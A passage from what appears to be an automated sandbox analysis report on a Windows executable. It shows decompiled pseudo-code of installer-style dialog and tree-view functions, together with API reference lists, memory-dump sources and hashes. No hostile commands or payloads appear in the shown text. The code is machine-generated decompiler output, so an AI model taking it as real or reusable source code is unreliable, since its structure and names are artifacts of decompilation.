									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ec1c; // 0x7a00a6
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f48c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a8b0);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4c0 = _a4;
					_v20 = 2;
					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
					_v16 = _t264;
					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a89c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D1(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D1(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f48c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a8b0 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a8b0 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f48c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404306(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404306(_v12);
								L93:
								return E00404338(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404cf4
0x00404cfc
0x00404d04
0x00404d0a
0x00404d22
0x00404d25
0x00404d26
0x00404f53
0x00404f5a
0x00404f6e
0x00404f5c
0x00404f5e
0x00404f61
0x00404f62
0x00404f69
0x00404f69
0x00404f7a
0x00404f88
0x00404f8b
0x00404fa1
0x00405016
0x00405019
0x0040501b
0x00405025
0x00405033
0x00405033
0x00405035
0x0040503f
0x00405045
0x00405048
0x0040504b
0x00405066
0x0040504d
0x00405057
0x00405057
0x0040504b
0x0040503f
0x00000000
0x00405019
0x00404fa6
0x00404fb1
0x00404fb6
0x00404fbd
0x00404fc2
0x00404fc6
0x00404fd1
0x00404fd1
0x00404fd5
0x00404fd9
0x00404fdd
0x00404ff0
0x00404fdf
0x00404fdf
0x00404fe6
0x00404fec
0x00404fe8
0x00404fe8
0x00404fe8
0x00404fe6
0x00404ff4
0x00404ff6
0x00405009
0x0040500c
0x0040500f
0x0040500f
0x00404fd9
0x00000000
0x00404fc6
0x00404fa8
0x00404faf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405069
0x00405069
0x00405070
0x004050e1
0x004050e9
0x004050f1
0x004050f1
0x004050fa
0x004050fc
0x00405103
0x00405106
0x00405106
0x0040510c
0x00405113
0x00405116
0x00405116
0x0040511c
0x00405122
0x00405128
0x00405128
0x00405135
0x00405295
0x0040529c
0x004052b9
0x004052bf
0x004052d1
0x004052d1
0x00000000
0x0040513b
0x0040513d
0x00405142
0x00405147
0x0040514c
0x0040514e
0x0040514e
0x0040514f
0x00405150
0x00405152
0x00405152
0x0040515a
0x0040519b
0x0040519d
0x004051ad
0x004051b0
0x004051b5
0x004051bc
0x004051bf
0x00405261
0x00405269
0x00405271
0x00405271
0x00405277
0x0040527f
0x00405290
0x00405290
0x00000000
0x0040527f
0x004051c5
0x004051c8
0x004051ce
0x004051d3
0x004051d5
0x004051d7
0x004051dd
0x004051e4
0x004051e9
0x004051f0
0x004051f3
0x004051f3
0x004051fa
0x00405206
0x0040520a
0x0040520c
0x0040520c
0x004051fc
0x004051fe
0x004051fe
0x0040522c
0x00405238
0x00405247
0x00405247
0x00405249
0x0040524c
0x00405255
0x00000000
0x0040515c
0x00405167
0x0040516a
0x0040516f
0x00405171
0x00405175
0x00405185
0x0040518f
0x00405191
0x00405194
0x00000000
0x00000000
0x00000000
0x00000000
0x00405177
0x00405177
0x0040517d
0x0040517f
0x0040517f
0x00405180
0x00405181
0x00000000
0x00405177
0x0040515a
0x00405135
0x00405078
0x00000000
0x0040508e
0x00405098
0x0040509d
0x00000000
0x00000000
0x004050af
0x004050b4
0x004050c0
0x004050c0
0x004050c2
0x004050d1
0x004050d3
0x004050d7
0x004050da
0x00000000
0x004050da
0x00405078
0x00404d2c
0x00404d2f
0x00404d32
0x00404d42
0x00404d55
0x00404d60
0x00404d66
0x00404d74
0x00404d87
0x00404d8c
0x00404d97
0x00404da0
0x00404db6
0x00404dc6
0x00404dd2
0x00404dd2
0x00404dd7
0x00404ddd
0x00404ddf
0x00404de2
0x00404de7
0x00404dec
0x00404dee
0x00404dee
0x00404e0e
0x00404e0e
0x00404e10
0x00404e11
0x00404e16
0x00404e1c
0x00404e20
0x00404e25
0x00404e2d
0x00404e31
0x00404e36
0x00404e3b
0x00404e43
0x00404e46
0x00404f15
0x00404f28
0x00000000
0x00404e4c
0x00404e4f
0x00404e52
0x00404e55
0x00404e55
0x00404e5a
0x00404e63
0x00404e66
0x00404e6a
0x00404e6d
0x00404e70
0x00404e79
0x00404e82
0x00404e85
0x00404e88
0x00404e8b
0x00404ec9
0x00404ef4
0x00404ecb
0x00404eda
0x00404eda
0x00404e8d
0x00404e90
0x00404e9e
0x00404ea8
0x00404eb0
0x00404eb7
0x00404ec2
0x00404ec2
0x00404e8b
0x00404efa
0x00404efb
0x00404f07
0x00404f07
0x00404f13
0x00404f2e
0x00404f31
0x00404f4e
0x00000000
0x00404f33
0x00404f38
0x00404f41
0x004052d3
0x004052e5
0x004052e5
0x00404f31
0x00000000
0x00404f13
0x00404e46

APIs

GetDlgItem.USER32 ref: 00404CED
GetDlgItem.USER32 ref: 00404CFA
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
LoadImageA.USER32 ref: 00404D60
SetWindowLongA.USER32 ref: 00404D7A
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
SendMessageA.USER32 ref: 00404DB6
SendMessageA.USER32 ref: 00404DC2
SendMessageA.USER32 ref: 00404DD2
DeleteObject.GDI32(00000110), ref: 00404DD7
SendMessageA.USER32 ref: 00404E02
SendMessageA.USER32 ref: 00404E0E
SendMessageA.USER32 ref: 00404EA8
SendMessageA.USER32 ref: 00404ED8

Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314

SendMessageA.USER32 ref: 00404EEC
GetWindowLongA.USER32 ref: 00404F1A
SetWindowLongA.USER32 ref: 00404F28
ShowWindow.USER32(?,00000005), ref: 00404F38
SendMessageA.USER32 ref: 00405033
SendMessageA.USER32 ref: 00405098
SendMessageA.USER32 ref: 004050AD
SendMessageA.USER32 ref: 004050D1
SendMessageA.USER32 ref: 004050F1
ImageList_Destroy.COMCTL32(?), ref: 00405106
GlobalFree.KERNEL32 ref: 00405116
SendMessageA.USER32 ref: 0040518F
SendMessageA.USER32 ref: 00405238
SendMessageA.USER32 ref: 00405247
InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
ShowWindow.USER32(?,00000000), ref: 004052BF
GetDlgItem.USER32 ref: 004052CA
ShowWindow.USER32(00000000), ref: 004052D1

Strings

M, xrefs: 00404E90
N, xrefs: 00404F71
, xrefs: 004052A9

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a8a0 = _t35;
					if(_t116 == 0x110) {
						 *0x42f448 = _t126;
						 *0x42a8b4 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429880 = _t92;
						E004042D1(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
						 *0x42ec0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a8a0 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f480;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040431D(0x40b);
						while(1) {
							_t37 =  *0x42a8a0;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f484;
							if(_t39 ==  *0x42f484) {
								E0040140B(1);
							}
							__eflags =  *0x42ec0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D1(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ec - _t134;
							_v32 = _t49;
							if( *0x42f4ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042F3(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429880, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ec - _t134;
							if( *0x42f4ec == _t134) {
								_push( *0x42a8b4);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429880);
							}
							E00404306();
							E0040624D(0x42a8b8, E00403DDE());
							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a8b8);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ec18);
									 *0x42a090 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ec18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D1(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ec0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ec18, 8);
									E0040431D(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ec - _t134;
								if( *0x42f4ec != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4e0 - _t134;
								if( *0x42f4e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ec18);
						 *0x42f448 = _t134;
						EndDialog(_t126,  *0x429c88);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ec18, 0x40f, 0, 1);
						__eflags =  *0x42ec0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404338(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ec - _t134;
										if( *0x42f4ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c88 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AA();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c88 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ec18);
						 *0x42ec18 = _a12;
						L58:
						if( *0x42b8b8 == _t134) {
							_t143 =  *0x42ec18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b8b8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403e06
0x00403e0f
0x00403f50
0x00403f54
0x00403f58
0x00403f5a
0x00403f5f
0x00403f6a
0x00403f75
0x00403f7a
0x00403f7c
0x00403f7e
0x00403f81
0x00403f86
0x00403f94
0x00403fa1
0x00403fa8
0x00403fa8
0x00403fa9
0x00403fa9
0x00403fae
0x00403fb4
0x00403fbb
0x00403fc1
0x00403fc3
0x00404003
0x00404008
0x0040400d
0x0040400d
0x00404012
0x0040401b
0x0040401d
0x00404022
0x00404028
0x0040402c
0x0040402c
0x00404031
0x00404037
0x00000000
0x00000000
0x00404042
0x00404048
0x00000000
0x00000000
0x00404051
0x00404059
0x0040405e
0x00404061
0x00404067
0x0040406c
0x0040406f
0x00404075
0x0040407a
0x0040407d
0x00404083
0x0040408b
0x00404091
0x00404097
0x0040409b
0x004040a2
0x004040a2
0x004040a2
0x004040ac
0x004040be
0x004040ca
0x004040cf
0x004040d9
0x004040df
0x004040e1
0x004040e6
0x004040e3
0x004040e3
0x004040e3
0x004040f6
0x0040410e
0x00404110
0x00404116
0x0040412b
0x00404118
0x00404121
0x00404123
0x00404123
0x00404131
0x00404142
0x00404153
0x0040415a
0x00404160
0x00404164
0x00404169
0x0040416b
0x00000000
0x00404171
0x00404171
0x00404173
0x00000000
0x00000000
0x00404179
0x0040417d
0x004041a2
0x004041a8
0x004041ae
0x004041b0
0x00000000
0x00000000
0x004041d6
0x004041dc
0x004041de
0x004041e3
0x00000000
0x00000000
0x004041e9
0x004041ec
0x004041ef
0x00404206
0x00404212
0x0040422b
0x00404231
0x00404235
0x0040423a
0x00404240
0x00000000
0x00000000
0x0040424a
0x00404255
0x00000000
0x00404255
0x0040417f
0x00404185
0x00000000
0x00000000
0x0040418b
0x00404191
0x00000000
0x00000000
0x00000000
0x00404197
0x0040416b
0x00404262
0x0040426e
0x00404275
0x00000000
0x00403fc5
0x00403fc5
0x00403fc8
0x00403ffb
0x00403ffb
0x00403ffd
0x00000000
0x00000000
0x00000000
0x00403ffd
0x00403fca
0x00403fce
0x00403fd3
0x00403fd5
0x00000000
0x00000000
0x00403fe5
0x00403fed
0x00000000
0x00403ff3
0x00403e21
0x00403e21
0x00403e25
0x00403e2a
0x00403e39
0x00403e39
0x00403e42
0x00403e4b
0x00403e56
0x00403e56
0x00403e62
0x00403e7e
0x00403e81
0x00403e94
0x00403e9a
0x00403f3d
0x00000000
0x00403f46
0x00403ea0
0x00403ead
0x00403eaf
0x00403eb1
0x00403ed0
0x00403ed0
0x00403ed3
0x00403ed8
0x00403edb
0x00403eeb
0x00403eec
0x00403eee
0x00403f24
0x00403f37
0x00000000
0x00403f37
0x00403ef0
0x00403ef6
0x00403f0f
0x00403f14
0x00403f16
0x00000000
0x00000000
0x00403f18
0x00403f04
0x00403f04
0x00403f06
0x00403f06
0x00000000
0x00403f06
0x00403ef9
0x00403efe
0x00000000
0x00403efe
0x00403edd
0x00403ee3
0x00000000
0x00000000
0x00403ee5
0x00000000
0x00403ee5
0x00403ed5
0x00000000
0x00403ed5
0x00403ebb
0x00403ec2
0x00403ec8
0x00403eca
0x00000000
0x00000000
0x00000000
0x00403eca
0x00403e86
0x00000000
0x00403e64
0x00403e6a
0x00403e74
0x0040427b
0x00404281
0x00404283
0x00404289
0x0040428e
0x00404294
0x00404294
0x00404289
0x0040429e
0x00000000
0x0040429e
0x00403e62

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
ShowWindow.USER32(?), ref: 00403E56
DestroyWindow.USER32 ref: 00403E6A
SetWindowLongA.USER32 ref: 00403E86
GetDlgItem.USER32 ref: 00403EA7
SendMessageA.USER32 ref: 00403EBB
IsWindowEnabled.USER32(00000000), ref: 00403EC2
GetDlgItem.USER32 ref: 00403F70
GetDlgItem.USER32 ref: 00403F7A
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F94
SendMessageA.USER32 ref: 00403FE5
GetDlgItem.USER32 ref: 0040408B
ShowWindow.USER32(00000000,?), ref: 004040AC
EnableWindow.USER32(?,?), ref: 004040BE
EnableWindow.USER32(?,?), ref: 004040D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
EnableMenuItem.USER32 ref: 004040F6
SendMessageA.USER32 ref: 0040410E
SendMessageA.USER32 ref: 00404121
lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
ShowWindow.USER32(?,0000000A), ref: 0040428E

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040443C, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429884 =  *0x429884 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404338(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
